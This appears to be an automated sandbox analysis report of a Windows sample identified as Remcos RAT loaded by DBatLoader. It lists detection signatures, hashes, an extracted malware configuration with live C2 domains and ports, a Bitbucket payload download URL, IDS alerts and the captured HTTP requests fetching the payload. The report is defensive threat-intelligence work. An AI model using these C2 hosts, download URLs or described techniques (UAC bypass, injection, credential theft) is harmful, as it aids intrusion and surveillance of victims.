Windows Analysis Report
D2pQ4J4GGZ.exe

Overview

General Information

Sample name:	D2pQ4J4GGZ.exe renamed because original name is a hash value
Original sample name:	0fca7f1081827c47d84ef12e4032db44a052539bd54c56394c610a672998f357.exe
Analysis ID:	1562869
MD5:	90c7bc4ce2d0f6eaadba08fac331f7b6
SHA1:	829acf583effec830edaed12ba8cda9c4bc1480f
SHA256:	0fca7f1081827c47d84ef12e4032db44a052539bd54c56394c610a672998f357
Tags:	doganalecmdexeuser-JAMESWT_MHT
Infos:

Detection

Remcos, DBatLoader

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Antivirus / Scanner detection for submitted sample

Antivirus detection for dropped file

Contains functionality to bypass UAC (CMSTPLUA)

Detected Remcos RAT

Early bird code injection technique detected

Found malware configuration

Icon mismatch, binary includes an icon from a different legit application in order to fool users

Malicious sample detected (through community Yara rule)

Multi AV Scanner detection for dropped file

Multi AV Scanner detection for submitted file

Sigma detected: Remcos

Suricata IDS alerts for network traffic

Yara detected DBatLoader

Yara detected Remcos RAT

Yara detected UAC Bypass using CMSTP

AI detected suspicious sample

Allocates memory in foreign processes

C2 URLs / IPs found in malware configuration

Contains functionality to check if a debugger is running (CheckRemoteDebuggerPresent)

Contains functionality to register a low level keyboard hook

Contains functionality to steal Chrome passwords or cookies

Contains functionality to steal Firefox passwords or cookies

Contains functionalty to change the wallpaper

Delayed program exit found

Drops PE files to the user root directory

Drops PE files with a suspicious file extension

Drops or copies cmd.exe with a different name (likely to bypass HIPS)

Queues an APC in another process (thread injection)

Sigma detected: DLL Search Order Hijackig Via Additional Space in Path

Sigma detected: Execution from Suspicious Folder

Sigma detected: New RUN Key Pointing to Suspicious Folder

Uses dynamic DNS services

AV process strings found (often used to terminate AV products)

Binary contains a suspicious time stamp

Checks if the current process is being debugged

Contains functionality for read data from the clipboard

Contains functionality to call native functions

Contains functionality to check if a connection to the internet is available

Contains functionality to check if a debugger is running (IsDebuggerPresent)

Contains functionality to download and launch executables

Contains functionality to dynamically determine API calls

Contains functionality to enumerate process and check for explorer.exe or svchost.exe (often used for thread injection)

Contains functionality to enumerate running services

Contains functionality to launch a control a shell (cmd.exe)

Contains functionality to launch a process as a different user

Contains functionality to modify clipboard data

Contains functionality to query CPU information (cpuid)

Contains functionality to query locales information (e.g. system language)

Contains functionality to read the PEB

Contains functionality to read the clipboard data

Contains functionality to retrieve information about pressed keystrokes

Contains functionality to shutdown / reboot the system

Contains functionality to simulate mouse events

Contains functionality which may be used to detect a debugger (GetProcessHeap)

Creates a process in suspended mode (likely to inject code)

Detected potential crypto function

Drops PE files

Drops PE files to the user directory

Extensive use of GetProcAddress (often used to hide API calls)

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Found dropped PE file which has not been started or loaded

Found large amount of non-executed APIs

Found potential string decryption / allocating functions

IP address seen in connection with other malware

Internet Provider seen in connection with other malware

JA3 SSL client fingerprint seen in connection with other malware

May sleep (evasive loops) to hinder dynamic analysis

PE file contains sections with non-standard names

Queries the volume information (name, serial number etc) of a device

Sample execution stops while process was sleeping (likely an evasion)

Sample file is different than original file name gathered from version info

Sigma detected: CurrentVersion Autorun Keys Modification

Sigma detected: Execution of Suspicious File Type Extension

Suricata IDS alerts with low severity for network traffic

Uses 32bit PE files

Uses Microsoft's Enhanced Cryptographic Provider

Uses a known web browser user agent for HTTP communication

Uses code obfuscation techniques (call, push, ret)

Yara detected Keylogger Generic

Yara signature match

Classification

Malware Threat Intel
Provided by

Name	Description	Attribution	Blogpost URLs	Link
Remcos, RemcosRAT	Remcos (acronym of Remote Control & Surveillance Software) is a commercial Remote Access Tool to remotely control computers.Remcos is advertised as legitimate software which can be used for surveillance and penetration testing purposes, but has been used in numerous hacking campaigns.Remcos, once installed, opens a backdoor on the computer, granting full access to the remote user.Remcos is developed by the cybersecurity company BreakingSecurity.	APT33 The Gorgon Group UAC-0050	http://malware-traffic-analysis.net/2017/12/22/index.html https://0xmrmagnezi.github.io/malware%20analysis/RemcosRAT/ https://asec.ahnlab.com/en/32376/ https://asec.ahnlab.com/ko/25837/ https://asec.ahnlab.com/ko/32101/	https://malpedia.caad.fkie.fraunhofer.de/details/win.remcos

Name	Description	Attribution	Blogpost URLs	Link
DBatLoader	This Delphi loader misuses Cloud storage services, such as Google Drive to download the Delphi stager component. The Delphi stager has the actual payload embedded as a resource and starts it.	No Attribution	https://blog.vincss.net/2020/09/re016-malware-analysis-modiloader-eng.html https://blog.vincss.net/re016-malware-analysis-modiloader/ https://gi7w0rm.medium.com/uncovering-ddgroup-a-long-time-threat-actor-d3b3020625a4 https://isc.sans.edu/diary/Malspam+pushes+ModiLoader+DBatLoader+infection+for+Remcos+RAT/29896 https://kienmanowar.wordpress.com/2024/04/09/quicknote-phishing-email-distributes-warzone-rat-via-dbatloader/	https://malpedia.caad.fkie.fraunhofer.de/details/win.dbatloader

Signatures

AV Detection

Antivirus / Scanner detection for submitted sample

Source: D2pQ4J4GGZ.exe

Avira: detected

Antivirus detection for dropped file

Source: C:\Users\Public\Libraries\Vjrsafyh.PIF

Avira: detection malicious, Label: HEUR/AGEN.1325882

Found malware configuration

Source: D2pQ4J4GGZ.exe	Malware Configuration Extractor: DBatLoader {"Download Url": ["https://bitbucket.org/ntim1478/gpmaw/downloads/250_Vjrsafyhidj"]}
Source: 0000000D.00000002.2349013309.000000001B1D7000.00000004.00000020.00020000.00000000.sdmp	Malware Configuration Extractor: Remcos {"Host:Port:Password": ["idearo24.duckdns.org:2404:0", "morewins.duckdns.org:2500:0"], "Assigned name": "i-must-win", "Connect interval": "1", "Install flag": "Disable", "Setup HKCU\\Run": "Enable", "Setup HKLM\\Run": "Enable", "Install path": "Application path", "Copy file": "remcos.exe", "Startup value": "Disable", "Hide file": "Disable", "Mutex": "Rmc-X0H4I6", "Keylog flag": "0", "Keylog path": "Application path", "Keylog file": "logs.dat", "Keylog crypt": "Disable", "Hide keylog file": "Disable", "Screenshot flag": "Disable", "Screenshot time": "1", "Take Screenshot option": "Disable", "Take screenshot title": "", "Take screenshot time": "5", "Screenshot path": "AppData", "Screenshot file": "Screenshots", "Screenshot crypt": "Disable", "Mouse option": "Disable", "Delete file": "Disable", "Audio record time": "5", "Audio folder": "MicRecords", "Connect delay": "0", "Copy folder": "Remcos", "Keylog folder": "remcos", "Keylog file max size": ""}

Multi AV Scanner detection for dropped file

Source: C:\Users\Public\Libraries\Vjrsafyh.PIF

ReversingLabs: Detection: 60%

Multi AV Scanner detection for submitted file

Source: D2pQ4J4GGZ.exe	ReversingLabs: Detection: 60%
Source: D2pQ4J4GGZ.exe	Virustotal: Detection: 71%			Perma Link

Yara detected Remcos RAT

Source: Yara match	File source: 13.2.SndVol.exe.2800000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 13.2.SndVol.exe.2800000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.2.colorcpl.exe.27c0000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.2.colorcpl.exe.27c0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.2.colorcpl.exe.27c0000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.2.colorcpl.exe.27c0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.D2pQ4J4GGZ.exe.29c0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0000000D.00000002.2322085295.0000000002800000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000B.00000002.2240919016.00000000027C0000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000D.00000002.2349013309.000000001B1D7000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.2170737614.000000007EAA0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000002.4491250282.0000000000540000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.2150744964.0000000002A47000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000B.00000002.2240779632.00000000006A8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000002.4491250282.0000000000528000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000002.4491421481.00000000027C0000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: D2pQ4J4GGZ.exe PID: 6804, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: colorcpl.exe PID: 5804, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: colorcpl.exe PID: 2964, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: SndVol.exe PID: 6608, type: MEMORYSTR

AI detected suspicious sample

Source: Submited Sample

Integrated Neural Analysis Model: Matched 100.0% probability

Uses Microsoft's Enhanced Cryptographic Provider

Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 8_2_027F38C8 CryptAcquireContextA,CryptGenRandom,CryptReleaseContext,	8_2_027F38C8
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 11_2_027F38C8 CryptAcquireContextA,CryptGenRandom,CryptReleaseContext,	11_2_027F38C8
Source: C:\Windows\SysWOW64\SndVol.exe	Code function: 13_2_028338C8 CryptAcquireContextA,CryptGenRandom,CryptReleaseContext,	13_2_028338C8

Source: D2pQ4J4GGZ.exe

Binary or memory string: -----BEGIN PUBLIC KEY-----

Exploits

Yara detected UAC Bypass using CMSTP

Source: Yara match	File source: 13.2.SndVol.exe.2800000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 13.2.SndVol.exe.2800000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.2.colorcpl.exe.27c0000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.2.colorcpl.exe.27c0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.2.colorcpl.exe.27c0000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.2.colorcpl.exe.27c0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.D2pQ4J4GGZ.exe.29c0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0000000D.00000002.2322085295.0000000002800000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000B.00000002.2240919016.00000000027C0000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.2170737614.000000007EAA0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.2150744964.0000000002A47000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000002.4491421481.00000000027C0000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: D2pQ4J4GGZ.exe PID: 6804, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: colorcpl.exe PID: 5804, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: colorcpl.exe PID: 2964, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: SndVol.exe PID: 6608, type: MEMORYSTR

Privilege Escalation

Contains functionality to bypass UAC (CMSTPLUA)

Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 8_2_027C7538 _wcslen,CoGetObject,	8_2_027C7538
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 11_2_027C7538 _wcslen,CoGetObject,	11_2_027C7538
Source: C:\Windows\SysWOW64\SndVol.exe	Code function: 13_2_02807538 _wcslen,CoGetObject,	13_2_02807538

Uses 32bit PE files

Source: D2pQ4J4GGZ.exe

Static PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, BYTES_REVERSED_LO, 32BIT_MACHINE, BYTES_REVERSED_HI

Source: unknown	HTTPS traffic detected: 185.166.143.49:443 -> 192.168.2.5:49705 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 3.5.29.78:443 -> 192.168.2.5:49706 version: TLS 1.2

Source:	Binary string: E:\Adlice\Truesight\x64\Release\truesight.pdb source: D2pQ4J4GGZ.exe, 00000000.00000002.2173590906.000000007F3E0000.00000004.00001000.00020000.00000000.sdmp, D2pQ4J4GGZ.exe, 00000000.00000003.2108744484.000000007ECD0000.00000004.00001000.00020000.00000000.sdmp, D2pQ4J4GGZ.exe, 00000000.00000003.2108137542.000000007ED20000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: easinvoker.pdb source: D2pQ4J4GGZ.exe, D2pQ4J4GGZ.exe, 00000000.00000002.2150540153.00000000029EE000.00000004.00001000.00020000.00000000.sdmp, D2pQ4J4GGZ.exe, 00000000.00000002.2164833746.0000000020717000.00000004.00001000.00020000.00000000.sdmp, D2pQ4J4GGZ.exe, 00000000.00000002.2173590906.000000007F3E0000.00000004.00001000.00020000.00000000.sdmp, D2pQ4J4GGZ.exe, 00000000.00000003.2032389922.000000007FAD0000.00000004.00001000.00020000.00000000.sdmp, D2pQ4J4GGZ.exe, 00000000.00000002.2164833746.0000000020700000.00000004.00001000.00020000.00000000.sdmp, D2pQ4J4GGZ.exe, 00000000.00000003.2108744484.000000007ECD0000.00000004.00001000.00020000.00000000.sdmp, D2pQ4J4GGZ.exe, 00000000.00000002.2164833746.00000000206D0000.00000004.00001000.00020000.00000000.sdmp, D2pQ4J4GGZ.exe, 00000000.00000003.2031234000.000000007FCE0000.00000004.00001000.00020000.00000000.sdmp, D2pQ4J4GGZ.exe, 00000000.00000003.2108137542.000000007ED20000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: cmd.pdbUGP source: esentutl.exe, 00000004.00000003.2123647740.00000000054C0000.00000004.00001000.00020000.00000000.sdmp, alpha.pif.4.dr
Source:	Binary string: ping.pdbGCTL source: esentutl.exe, 00000005.00000003.2129503162.0000000005620000.00000004.00001000.00020000.00000000.sdmp, xpha.pif.5.dr
Source:	Binary string: easinvoker.pdbH source: D2pQ4J4GGZ.exe, 00000000.00000002.2173590906.000000007F3E0000.00000004.00001000.00020000.00000000.sdmp, D2pQ4J4GGZ.exe, 00000000.00000003.2108744484.000000007ECD0000.00000004.00001000.00020000.00000000.sdmp, D2pQ4J4GGZ.exe, 00000000.00000003.2108137542.000000007ED20000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: easinvoker.pdbGCTL source: D2pQ4J4GGZ.exe, 00000000.00000003.2032127390.000000000249D000.00000004.00000020.00020000.00000000.sdmp, D2pQ4J4GGZ.exe, 00000000.00000002.2150540153.00000000029EE000.00000004.00001000.00020000.00000000.sdmp, D2pQ4J4GGZ.exe, 00000000.00000002.2164833746.0000000020717000.00000004.00001000.00020000.00000000.sdmp, D2pQ4J4GGZ.exe, 00000000.00000003.2130066315.000000002180D000.00000004.00000020.00020000.00000000.sdmp, D2pQ4J4GGZ.exe, 00000000.00000003.2032389922.000000007FAD0000.00000004.00001000.00020000.00000000.sdmp, D2pQ4J4GGZ.exe, 00000000.00000002.2164833746.0000000020700000.00000004.00001000.00020000.00000000.sdmp, D2pQ4J4GGZ.exe, 00000000.00000002.2164833746.00000000206D0000.00000004.00001000.00020000.00000000.sdmp, D2pQ4J4GGZ.exe, 00000000.00000003.2031234000.000000007FCE0000.00000004.00001000.00020000.00000000.sdmp, D2pQ4J4GGZ.exe, 00000000.00000003.2130066315.000000002183E000.00000004.00000020.00020000.00000000.sdmp, D2pQ4J4GGZ.exe, 00000000.00000002.2149724742.00000000024A2000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: cmd.pdb source: esentutl.exe, 00000004.00000003.2123647740.00000000054C0000.00000004.00001000.00020000.00000000.sdmp, alpha.pif.4.dr
Source:	Binary string: ping.pdb source: esentutl.exe, 00000005.00000003.2129503162.0000000005620000.00000004.00001000.00020000.00000000.sdmp, xpha.pif.5.dr

Source: C:\Users\user\Desktop\D2pQ4J4GGZ.exe	Code function: 0_2_029C5908 GetModuleHandleA,GetProcAddress,lstrcpynA,lstrcpynA,lstrcpynA,FindFirstFileA,FindClose,lstrlenA,lstrcpynA,lstrlenA,lstrcpynA,	0_2_029C5908
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 8_2_027C928E __EH_prolog,__CxxThrowException@8,FindFirstFileW,FindNextFileW,FindClose,FindClose,	8_2_027C928E
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 8_2_027DC322 FindFirstFileW,FindNextFileW,RemoveDirectoryW,SetFileAttributesW,DeleteFileW,GetLastError,FindClose,RemoveDirectoryW,FindClose,	8_2_027DC322
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 8_2_027CC388 FindFirstFileW,PathFileExistsW,FindNextFileW,FindClose,FindClose,	8_2_027CC388
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 8_2_027C96A0 __EH_prolog,FindFirstFileW,FindNextFileW,FindClose,FindClose,	8_2_027C96A0
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 8_2_027CBB6B FindFirstFileA,FindClose,DeleteFileA,GetLastError,DeleteFileA,GetLastError,FindNextFileA,FindClose,	8_2_027CBB6B
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 8_2_027D9B86 FindFirstFileW,FindNextFileW,FindNextFileW,	8_2_027D9B86
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 8_2_027C7877 FindFirstFileW,FindNextFileW,	8_2_027C7877
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 8_2_027C8847 __EH_prolog,FindFirstFileW,__CxxThrowException@8,FindNextFileW,FindClose,	8_2_027C8847
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 8_2_0280E8F9 FindFirstFileExA,	8_2_0280E8F9
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 8_2_027CBD72 FindFirstFileA,FindClose,DeleteFileA,GetLastError,FindNextFileA,FindClose,FindClose,	8_2_027CBD72
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 11_2_027C928E __EH_prolog,__CxxThrowException@8,FindFirstFileW,FindNextFileW,FindClose,FindClose,	11_2_027C928E
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 11_2_027DC322 FindFirstFileW,FindNextFileW,RemoveDirectoryW,SetFileAttributesW,DeleteFileW,GetLastError,FindClose,RemoveDirectoryW,FindClose,	11_2_027DC322
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 11_2_027CC388 FindFirstFileW,PathFileExistsW,FindNextFileW,FindClose,FindClose,	11_2_027CC388
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 11_2_027C96A0 __EH_prolog,FindFirstFileW,FindNextFileW,FindClose,FindClose,	11_2_027C96A0
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 11_2_027CBB6B FindFirstFileA,FindClose,DeleteFileA,GetLastError,DeleteFileA,GetLastError,FindNextFileA,FindClose,	11_2_027CBB6B
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 11_2_027D9B86 FindFirstFileW,FindNextFileW,FindNextFileW,	11_2_027D9B86
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 11_2_027C7877 FindFirstFileW,FindNextFileW,	11_2_027C7877
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 11_2_027C8847 __EH_prolog,FindFirstFileW,__CxxThrowException@8,FindNextFileW,FindClose,	11_2_027C8847
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 11_2_0280E8F9 FindFirstFileExA,	11_2_0280E8F9
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 11_2_027CBD72 FindFirstFileA,FindClose,DeleteFileA,GetLastError,FindNextFileA,FindClose,FindClose,	11_2_027CBD72
Source: C:\Windows\SysWOW64\SndVol.exe	Code function: 13_2_0280928E __EH_prolog,__CxxThrowException@8,FindFirstFileW,FindNextFileW,FindClose,FindClose,	13_2_0280928E
Source: C:\Windows\SysWOW64\SndVol.exe	Code function: 13_2_0280C388 FindFirstFileW,PathFileExistsW,FindNextFileW,FindClose,FindClose,	13_2_0280C388
Source: C:\Windows\SysWOW64\SndVol.exe	Code function: 13_2_0281C322 FindFirstFileW,FindNextFileW,RemoveDirectoryW,SetFileAttributesW,DeleteFileW,GetLastError,FindClose,RemoveDirectoryW,FindClose,	13_2_0281C322
Source: C:\Windows\SysWOW64\SndVol.exe	Code function: 13_2_028096A0 __EH_prolog,FindFirstFileW,FindNextFileW,FindClose,FindClose,	13_2_028096A0
Source: C:\Windows\SysWOW64\SndVol.exe	Code function: 13_2_02819B86 FindFirstFileW,FindNextFileW,FindNextFileW,	13_2_02819B86
Source: C:\Windows\SysWOW64\SndVol.exe	Code function: 13_2_0280BB6B FindFirstFileA,FindClose,DeleteFileA,GetLastError,DeleteFileA,GetLastError,FindNextFileA,FindClose,	13_2_0280BB6B
Source: C:\Windows\SysWOW64\SndVol.exe	Code function: 13_2_0284E8F9 FindFirstFileExA,	13_2_0284E8F9
Source: C:\Windows\SysWOW64\SndVol.exe	Code function: 13_2_02808847 __EH_prolog,FindFirstFileW,__CxxThrowException@8,FindNextFileW,FindClose,	13_2_02808847
Source: C:\Windows\SysWOW64\SndVol.exe	Code function: 13_2_02807877 FindFirstFileW,FindNextFileW,	13_2_02807877
Source: C:\Windows\SysWOW64\SndVol.exe	Code function: 13_2_0280BD72 FindFirstFileA,FindClose,DeleteFileA,GetLastError,FindNextFileA,FindClose,FindClose,	13_2_0280BD72

Source: C:\Windows\SysWOW64\colorcpl.exe

Code function: 8_2_027C7CD2 SetEvent,GetFileAttributesW,DeleteFileW,ShellExecuteW,GetLogicalDriveStringsA,SetFileAttributesW,DeleteFileA,Sleep,StrToIntA,CreateDirectoryW,

8_2_027C7CD2

Networking

Suricata IDS alerts for network traffic

Source: Network traffic	Suricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.5:49716 -> 192.169.69.26:2500
Source: Network traffic	Suricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.5:49796 -> 192.169.69.26:2404
Source: Network traffic	Suricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.5:49745 -> 192.169.69.26:2404
Source: Network traffic	Suricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.5:49821 -> 192.169.69.26:2500
Source: Network traffic	Suricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.5:49707 -> 192.169.69.26:2404
Source: Network traffic	Suricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.5:49769 -> 192.169.69.26:2500
Source: Network traffic	Suricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.5:49900 -> 192.169.69.26:2404
Source: Network traffic	Suricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.5:49874 -> 192.169.69.26:2500
Source: Network traffic	Suricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.5:49998 -> 192.169.69.26:2500
Source: Network traffic	Suricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.5:49993 -> 192.169.69.26:2404
Source: Network traffic	Suricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.5:49994 -> 192.169.69.26:2500
Source: Network traffic	Suricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.5:50000 -> 192.169.69.26:2500
Source: Network traffic	Suricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.5:49991 -> 192.169.69.26:2404
Source: Network traffic	Suricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.5:49992 -> 192.169.69.26:2500
Source: Network traffic	Suricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.5:49848 -> 192.169.69.26:2404
Source: Network traffic	Suricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.5:49997 -> 192.169.69.26:2404
Source: Network traffic	Suricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.5:49952 -> 192.169.69.26:2404
Source: Network traffic	Suricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.5:49995 -> 192.169.69.26:2404
Source: Network traffic	Suricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.5:49977 -> 192.169.69.26:2500
Source: Network traffic	Suricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.5:49996 -> 192.169.69.26:2500
Source: Network traffic	Suricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.5:49999 -> 192.169.69.26:2404
Source: Network traffic	Suricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.5:49925 -> 192.169.69.26:2500

C2 URLs / IPs found in malware configuration

Source: Malware configuration extractor	URLs: https://bitbucket.org/ntim1478/gpmaw/downloads/250_Vjrsafyhidj
Source: Malware configuration extractor	URLs: idearo24.duckdns.org
Source: Malware configuration extractor	URLs: morewins.duckdns.org

Uses dynamic DNS services

Source: unknown	DNS query: name: morewins.duckdns.org
Source: unknown	DNS query: name: idearo24.duckdns.org

Contains functionality to check if a connection to the internet is available

Source: C:\Users\user\Desktop\D2pQ4J4GGZ.exe

Code function: 0_2_029DE4B8 InternetCheckConnectionA,

0_2_029DE4B8

IP address seen in connection with other malware

Source: Joe Sandbox View	IP Address: 185.166.143.49 185.166.143.49
Source: Joe Sandbox View	IP Address: 192.169.69.26 192.169.69.26
Source: Joe Sandbox View	IP Address: 192.169.69.26 192.169.69.26

Internet Provider seen in connection with other malware

Source: Joe Sandbox View

ASN Name: WOWUS WOWUS

JA3 SSL client fingerprint seen in connection with other malware

Source: Joe Sandbox View

JA3 fingerprint: a0e9f5d64349fb13191bc781f81f42e1

Suricata IDS alerts with low severity for network traffic

Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49705 -> 185.166.143.49:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49706 -> 3.5.29.78:443

Uses a known web browser user agent for HTTP communication

Source: global traffic	HTTP traffic detected: GET /ntim1478/gpmaw/downloads/250_Vjrsafyhidj HTTP/1.1Connection: Keep-AliveAccept: /User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: bitbucket.org
Source: global traffic	HTTP traffic detected: GET /e427e629-62a6-4ecd-bf22-56e4d6ea083f/downloads/0d838bb6-e11a-4581-89b6-9d1c81b740c6/250_Vjrsafyhidj?response-content-disposition=attachment%3B%20filename%3D%22250_Vjrsafyhidj%22&AWSAccessKeyId=ASIA6KOSE3BNJVZFSC5J&Signature=X9FPDBgOKbMRRHwdgtMpXClEkas%3D&x-amz-security-token=IQoJb3JpZ2luX2VjEID%2F%2F%2F%2F%2F%2F%2F%2F%2F%2FwEaCXVzLWVhc3QtMSJHMEUCIQDBsGro9ewLlxm1Jmlfi5RtGFKUidgU0v40nryUex%2FcIgIgI%2BrBcW%2F3yv43XRHYbOxWMP4rmh1qdoHeaiYCvGtj%2BUAqpwIIKBAAGgw5ODQ1MjUxMDExNDYiDKhoBvZz8dz3MdHLcyqEAqNX5Lbiey9VA4Nu2PKLpWe7AzQs30CYCQ17ojsFQBzWb9jeoj1R2lBiZuhmaGwyKFMZacVqoVxGu%2FNGxYiE5WD0T5%2FhYQC8Yx%2BpuwlCMYrdpZyr8LRd1Dspqx%2BDUimzDabcJHysCSHaxuL9Vias0chfJAV6mJYRKWIHNuFasT2CBnFQ1EmYqd%2FFNkaneV9mppb%2BaZ1xRVY6%2Bqv%2BcxJDSZrxDbYwJyM91nLC6Db5%2BAE7H9gjoWPlzs1RzlbZ9U6oQcsRra5iAMM5bKNk1DlWdmHiq0awQP3afEwfLFft8xhJw6j3%2Fs2HWvKLkfxj3x89YGzjHxLi0UqjQ3ffKLCPlhujaT27MMHplboGOp0BD9q41D6kLh9F0nVQM4xyf7fNq9CF0Ik0oCST0SE%2FeyLSoPqdarJpvPrLFVvqTmHs9Xrrnsn0b%2FWvuVqJdzvwFoysrGnC2guwi1wRx%2BRKdh6HIIzmhk1zI5aGT2YQWpP6qaOwQTzLKadxNdAhW0xo3LTCGGxx3cNyux56ve0aK891sK6sUoIojqjLnr9e3jrEAHd%2FC8rvFymkN3%2BxUg%3D%3D&Expires=1732606921 HTTP/1.1Connection: Keep-AliveAccept: /User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: bbuseruploads.s3.amazonaws.com

Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
